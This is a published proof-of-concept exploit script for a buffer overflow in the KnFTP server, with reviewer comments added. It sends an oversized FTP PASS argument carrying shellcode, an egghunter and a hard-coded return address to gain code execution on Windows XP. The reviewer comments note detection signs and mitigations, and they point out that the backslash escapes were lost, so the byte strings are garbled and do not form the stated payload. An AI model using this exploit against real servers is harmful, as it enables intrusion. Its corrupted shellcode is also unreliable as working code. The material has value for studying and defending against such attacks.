
# Title : KnFTP Server Buffer Overflow Exploit
# Published : 2011-09-12
# Author :


#!/usr/bin/python
# KnFTP Server buffer-overflow proof of concept, as published (Python 2:
# print statements, raw_input, the `buffer` builtin name).
#
# NOTE(review): the backslashes of the "\x.." byte escapes and of "\r\n"
# appear to have been lost when this listing was captured (they print as
# "x90", "rn", a leading "n" in the banner, ...). As written, every string
# literal below is plain ASCII text, so the byte counts given in the author's
# comments (271, 227, 32, 8) do not describe what this copy actually builds.
#
# What the code shows: an FTP session whose PASS argument is far longer than
# any legitimate password. Detection: alert on USER/PASS arguments of several
# hundred bytes or containing long runs of a single repeated byte. Mitigation:
# the author notes knftpd.exe is the only module without SafeSEH and the
# return address is a hard-coded kernel32.dll address from an XP SP3 test
# machine (a fixed, non-randomized load address); DEP/ASLR-capable hosts, a
# patched or replaced FTP server, and limiting FTP exposure reduce the risk.
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket

# Banner (Python 2 print statements; the stray "n" is presumably a lost "\n").
print "n====================="
print "KnFTP Buffer Overflow"
print "   Written by Blake  "
print "=====================n"

# Exactly two positional arguments are expected: target host and port.
if len(sys.argv) !=3:
	print "[*] Usage: %s <ip> <port>" % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
port = int(sys.argv[2])   # a non-numeric port raises ValueError here, uncaught

# Author's description of the layout: 271 bytes available, 227 used by a
# windows/exec payload that launches calc.exe. Kept verbatim; see the
# escape-sequence note at the top of the file.
# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
shellcode =(
"xb8xe8xaax5exc0xdbxd6xd9x74x24xf4x5bx31xc9xb1"
"x33x31x43x12x03x43x12x83x03x56xbcx35x2fx4fxc8"
"xb6xcfx90xabx3fx2axa1xf9x24x3fx90xcdx2fx6dx19"
"xa5x62x85xaaxcbxaaxaax1bx61x8dx85x9cx47x11x49"
"x5exc9xedx93xb3x29xcfx5cxc6x28x08x80x29x78xc1"
"xcfx98x6dx66x8dx20x8fxa8x9ax19xf7xcdx5cxedx4d"
"xcfx8cx5exd9x87x34xd4x85x37x45x39xd6x04x0cx36"
"x2dxfex8fx9ex7fxffxbexdex2cx3ex0fxd3x2dx06xb7"
"x0cx58x7cxc4xb1x5bx47xb7x6dxe9x5ax1fxe5x49xbf"
"x9ex2ax0fx34xacx87x5bx12xb0x16x8fx28xccx93x2e"
"xffx45xe7x14xdbx0exb3x35x7axeax12x49x9cx52xca"
"xefxd6x70x1fx89xb4x1exdex1bxc3x67xe0x23xccxc7"
"x89x12x47x88xcexaax82xedx21xe1x8fx47xaaxacx45"
"xdaxb7x4exb0x18xcexccx31xe0x35xccx33xe5x72x4a"
"xafx97xebx3fxcfx04x0bx6axacxcbx9fxf6x1dx6ex18"
"x9cx61")

# Per the author's comment: a 32-byte egghunter that scans for the "W00T"
# marker (`egg` below) and passes control to what follows it.
# 32 byte egghunter
egghunter =(
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8"
"x54x30x30x57" # egg - W00T
"x8bxfaxafx75xeaxafx75xe7xffxe7")

# Marker the egghunter searches for ("W00T" twice, in the author's layout).
egg = "x54x30x30x57x54x30x30x57"
# Filler meant to pad the 271-byte region; `buffer` shadows a Python 2
# builtin. In this copy `len(egg + shellcode)` exceeds 271 (each lost escape
# is three characters), so the multiplier is negative and `buffer` is "".
buffer = "x90" * (271 - len(egg + shellcode))
# Return address, hard-coded to the kernel32.dll of the author's XP SP3
# test machine; it does not hold on other builds or under ASLR.
eip = "x13x44x87x7c" 	# 7C874413 JMP ESP - kernel32.dll
# Padding between the return address and the egghunter (author's layout).
nops = "x90" * 8

# No settimeout() is set, so connect()/recv() below can block indefinitely.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port) 
# NOTE(review): the bare `except:` catches every exception raised inside the
# block (send/recv failures, a KeyboardInterrupt or EOFError at raw_input)
# and reports all of them as a connection failure; the socket is never closed
# on that path. `except socket.error` with a `finally: s.close()` would be
# the usual shape.
try:
	s.connect((target,port))
	print "[+] Sending payload"
	s.send("USER blake rn")   # FTP USER; "rn" is presumably a lost "\r\n" line terminator
	s.recv(1024)              # server reply discarded
	# Oversized PASS argument: this line is the trigger the author describes.
	s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + "rn")
	s.recv(1024)
	s.close()
	print "[+] Payload sent successfully"
	raw_input("[+] Press any key to exitn")
except:
	print "[+] Could not connect to %s!" % target
	sys.exit(0)